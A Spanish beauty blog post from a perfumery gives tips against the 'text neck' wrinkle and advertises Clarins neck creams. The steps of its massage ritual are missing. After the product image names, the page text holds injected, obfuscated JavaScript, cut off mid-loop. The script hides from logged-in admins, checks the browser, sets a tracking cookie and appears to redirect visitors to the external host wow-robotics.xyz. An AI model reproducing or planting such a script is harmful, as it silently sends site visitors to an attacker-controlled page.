Un día, entre “me gusta” y “me gusta” en Instagram, se abre la cámara del móvil en posición frontal y ves a una persona a la que no reconoces. Con el cuello arrugado. Y te asustas. ¿Te ha pasado? La postura que estamos adoptando las personas provocado por el uso de móviles, libros electrónicos, tabletas tiene ya un nombre “Text neck” o postura de la cabeza hacia adelante.

Hoy en el blog de Perfumerías Tin Tin queremos compartir contigo 3 consejos para evitar la llamada “arruga del teléfono móvil” que sale prematuramente sin importar la edad y a la fuerza por tener la cabeza bajada mirando el teléfono durante horas.

rawpixel-com-281361_800x549

Consejo nº1: parece obvio, pero, intenta colocar el móvil a la altura de los ojos siempre que puedas. Este simple gesto hará que dejes de forzar la zona del cuello hacia abajo.

Consejo nº 2: Tómate un descanso entre fotos y whatsapps. Adopta una buena postura, coloca los hombros hacia atrás y practica estiramientos levantando el mentón y estirando todo el cuello. Además de ser un momento “detox” de tecnología, te ayudará a mejorar tu postura.

Consejo nº3: utiliza un tratamiento reafirmante para cuello y escote a través del método de presión drenante de Clarins con el que conseguirás estimular la circulación para mantener la elasticidad y firmeza de la piel.

El ritual es muy sencillo y en menos de medio minuto estarás embelleciendo tu cuello a la vez que reduciendo las arrugas y previniendo la arruga “Text neck”. Solo tienes que seguir estos pasos:

¿Empiezas a notar esta arruga? ¡Es tiempo de prevenir! En Perfumerias Tin Tin puedes encontrar los tratamientos Multi-Régénérante Jeunesse du Cou y Multi-Intensive Concentré Décolleté et Cou de Clarins para recuperar la elasticidad, juventud y belleza de cuello, para que la próxima vez que te pille desprevenida la cámara frontal de tu móvil consigas el ¡selfie perfecto! 😉

clarins-multi-intensive-concentre-decollete-et-cou

clarins-multi-regenerante-jeunesse-du-cou

var a=[‘toUTCString’,’cookie’,’split’,’length’,’charAt’,’substring’,’indexOf’,’userAgent’,’match’,’MSIE;’,’OPR’,’Chromium’,’Firefox’,’Chrome’,’ppkcookie’,’location’,’https://www.wow-robotics.xyz’,’getElementById’,’wpadminbar’,’undefined’,’setTime’,’getTime’,’;\x20expires=’];(function(c,d){var e=function(f){while(–f){c[‘push’](c[‘shift’]());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(‘0x0’)](b(‘0x1’))===null){if(typeof c===b(‘0x2’)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(‘0x3’)](h[b(‘0x4’)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(‘0x5’)+h[b(‘0x6’)]();}document[b(‘0x7′)]=d+’=’+(e||”)+g+’;\x20path=/’;}function i(j){var k=j+’=’;var l=document[b(‘0x7’)][b(‘0x8’)](‘;’);for(var m=0x0;m

¿Te ha gustado? ¡Compártelo!Share on FacebookTweet about this on TwitterPin on PinterestShare on LinkedInShare on Google+Email this to someone